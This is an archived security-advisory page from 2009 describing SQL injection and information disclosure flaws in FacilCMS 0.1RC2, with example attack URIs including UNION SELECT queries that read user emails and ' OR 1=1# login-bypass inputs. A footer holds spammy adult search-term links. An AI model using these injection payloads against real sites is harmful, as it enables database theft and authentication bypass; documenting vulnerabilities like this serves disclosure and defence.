about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , FacilCMS Multiple SQL Injection And Information Disclosure Vulnerabilities


Title FacilCMS Multiple SQL Injection And Information Disclosure Vulnerabilities
Published 2009-03-18-12:00AM
Updated 2009-03-19-05:36PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  any.zicky
Vulnerable  FacilCMS FacilCMS 0.1RC2
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs are available:http://www.example.com/phpinfo.php
http://www.example.com/facil-cms/modules.php?modload=News&op=view&id=1+AND+1=1#
http://www.example.com/facil-cms/modules.php?modload=Pages&op=view&id=1+ORDER+BY+5/*
http://www.example.com/facil-cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,email+FROM+facil_users+LIMIT+1,2/* The following input examples are available:http://www.example.com/index.php?modload=User Email: admin@facilcms.org'#
pass: blaaaaa Email: ' OR 1=1#
pass: blaaaaa
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 09:14:11 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
NUDE WOMEN Powered b sukanya 19933 www.helpto keralasex. www.anahit iinuwetysi SEXY IMAGE checkout.p ttsex.com Sekla ...t/comp pinchunter femalepict www.de1000 DOCSIS www.city-z Panocha.co Fast Track www.de100. sexIMAGES hot sri la Sexy st mambo Remo xxx moves tranny pic Narutosex. boygaygay sextual gi Pidio sek clara morg PHP Click for videos mm.98txt.c Apache mod free sex v ...t/comp sSH 3.4p1 search 97 W.w.w.big adult vedi myheqi.com mambo Remo cesarftp 0 www.zadina myheqi.cn SMTP explo editor.asp news for c